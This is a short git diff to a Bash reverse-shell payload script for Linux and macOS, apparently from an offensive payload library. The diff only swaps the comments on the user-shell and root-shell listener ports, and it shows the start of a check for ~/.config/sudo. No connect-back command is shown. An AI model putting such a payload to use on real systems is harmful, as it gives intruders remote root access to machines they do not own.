diff --git a/payloads/library/remote_access/Root_Reverse_Shell_linux_mac/payload.sh b/payloads/library/remote_access/Root_Reverse_Shell_linux_mac/payload.sh index 7b7cd436..8bb8fe8b 100644 --- a/payloads/library/remote_access/Root_Reverse_Shell_linux_mac/payload.sh +++ b/payloads/library/remote_access/Root_Reverse_Shell_linux_mac/payload.sh @@ -1,8 +1,8 @@ #!/bin/bash LISTENER_IP="127.0.0.1" -LISTENER1_PORT="1337" #Listener for user shell -LISTENER2_PORT="4444" #Listener for root shell +LISTENER1_PORT="1337" #Listener for root shell +LISTENER2_PORT="4444" #Listener for user shell if [ ! -d ~/.config/sudo ] then